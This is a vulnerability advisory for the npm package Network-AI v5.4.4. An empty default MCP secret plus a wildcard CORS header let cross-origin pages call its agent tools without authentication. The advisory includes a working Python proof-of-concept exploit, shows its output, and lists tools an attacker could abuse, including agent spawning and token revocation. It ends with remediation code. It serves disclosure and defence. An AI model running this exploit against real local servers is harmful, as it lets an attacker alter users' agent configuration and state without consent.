PT-2026-42629 · Npm · Network-Ai

Published

2026-05-21

·

Updated

2026-05-21

CVSS v3.1

7.6

High

VectorAV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L

Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret

FieldValue
RepositoryJovancoding/Network-AI
Affected versionv5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac)

Summary

The MCP SSE server defaults to an empty secret (process.env['NETWORK AI MCP SECRET'] ?? '' at bin/mcp-server.ts:89), which causes isAuthorized (lib/mcp-transport-sse.ts:254) to return true unconditionally for every request — no Authorization header is required. Simultaneously, handleRequest sets Access-Control-Allow-Origin: * (lib/mcp-transport-sse.ts:272) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools — including config set, agent spawn, and blackboard write — against a default-configured localhost server.

Affected Code

bin/mcp-server.ts:89 — default secret resolves to empty string, enabling open access
typescript
  secret: process.env['NETWORK AI MCP SECRET'] ?? '',
lib/mcp-transport-sse.ts:254 — auth guard short-circuits to true when secret is falsy
typescript
 private isAuthorized(req: http.IncomingMessage): boolean {
  if (!this. opts.secret) return true;
  const authHeader = req.headers['authorization'];
  if (typeof authHeader !== 'string') return false;
  const parts = authHeader.split(' ');
  return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this. opts.secret;
 }
lib/mcp-transport-sse.ts:272 — wildcard CORS header applied unconditionally before any auth check
typescript
 private handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {
  // CORS — allow any MCP client to connect
  res.setHeader('Access-Control-Allow-Origin', '*');
  res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
  res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
lib/mcp-transport-sse.ts:367-368 — authenticated path dispatches parsed JSON-RPC frame directly to handleRPC with no further caller validation
typescript
    const rpc = JSON.parse(body) as McpJsonRpcRequest;
    const response = await this. bridge.handleRPC(rpc);
Any cross-origin browser request reaches handleRPC because isAuthorized returns true (empty secret) and the Access-Control-Allow-Origin: * header lets the browser expose the response to the calling script.

Proof of Concept

Environment
  • Network-AI v5.4.4 (latest)
  • Docker container bound to 127.0.0.1:3001
  • Python 3 + requests
poc.py
python
import sys
import requests

BASE = "http://127.0.0.1:3001"

# Step 1: Verify CORS wildcard (simulating cross-origin preflight)
preflight = requests.options(
  f"{BASE}/mcp",
  headers={
    "Origin": "http://evil.example.com",
    "Access-Control-Request-Method": "POST",
    "Access-Control-Request-Headers": "Content-Type",
  },
)
acao = preflight.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] OPTIONS /mcp -> {preflight.status code}, Access-Control-Allow-Origin: {acao!r}")
if acao != "*":
  print(f"RESULT: FAIL — expected ACAO='*', got {acao!r}")
  sys.exit(1)

# Step 2: Invoke config set with NO Authorization header from cross-origin
rpc payload = {
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "config set",
    "arguments": {
      "key": "maxParallelAgents",
      "value": "999"
    }
  }
}
resp = requests.post(
  f"{BASE}/mcp",
  json=rpc payload,
  headers={
    "Content-Type": "application/json",
    "Origin": "http://evil.example.com",
    # No Authorization header — exploiting empty-secret bypass
  },
)
print(f"[*] POST /mcp (no auth, cross-origin) -> {resp.status code}")
print(f"[*] Response body: {resp.text[:800]}")
resp acao = resp.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] Response Access-Control-Allow-Origin: {resp acao!r}")
if resp.status code != 200:
  print(f"RESULT: FAIL — expected 200, got {resp.status code}")
  sys.exit(1)

body = resp.json()
result content = body.get("result", {})
is error = result content.get("isError", True)
if is error:
  print(f"RESULT: FAIL — tool returned isError=true: {result content}")
  sys.exit(1)

# Step 3: Confirm CORS header on actual response (browser can read it)
if resp acao != "*":
  print(f"RESULT: FAIL — response ACAO not '*', browser would block read: {resp acao!r}")
  sys.exit(1)

print(f"RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config set executed without credentials (maxParallelAgents set to 999)")
Output
[*] OPTIONS /mcp -> 204, Access-Control-Allow-Origin: '*'
[*] POST /mcp (no auth, cross-origin) -> 200
[*] Response body: {"jsonrpc":"2.0","id":1,"result":{"content":[{"type":"text","text":"{"ok":true,"tool":"config set","data":{"key":"maxParallelAgents","previous":null,"current":999,"applied":true}}"}],"isError":false}}
[*] Response Access-Control-Allow-Origin: '*'
RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config set executed without credentials (maxParallelAgents set to 999)
Verified conditions
  1. OPTIONS /mcp → 204, Access-Control-Allow-Origin: * — browser preflight accepted by server
  2. POST /mcp (no Authorization header) → 200, isError: falseconfig set executed without credentials
  3. Response Access-Control-Allow-Origin: * — response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page

Impact

Any web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (config set); the same vector applies to agent spawn (spawning arbitrary agents), blackboard write / blackboard delete (corrupting shared agent state), and token create / token revoke (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).

Remediation

  1. Require a non-empty secret at startup: in bin/mcp-server.ts, reject launch when args.secret is empty and --stdio is not set:
typescript
if (!args.secret && !args.stdio) {
 console.error('ERROR: --secret <token> or NETWORK AI MCP SECRET must be set for SSE mode.');
 process.exit(1);
}
  1. Restrict CORS to localhost origins only: in lib/mcp-transport-sse.ts: handleRequest, replace the wildcard with an allowlist:
typescript
const origin = req.headers['origin'] ?? '';
const allowed = /^https?://(localhost|127.0.0.1)(:d+)?$/.test(origin);
res.setHeader('Access-Control-Allow-Origin', allowed ? origin : '');
res.setHeader('Vary', 'Origin');
  1. Move CORS headers after the auth check so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (/sse) if cross-origin streaming is needed and not on /mcp.

Fix

Origin Validation Error

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-346

Related Identifiers

GHSA-J3VX-CX2R-PVG8

Affected Products

Network-Ai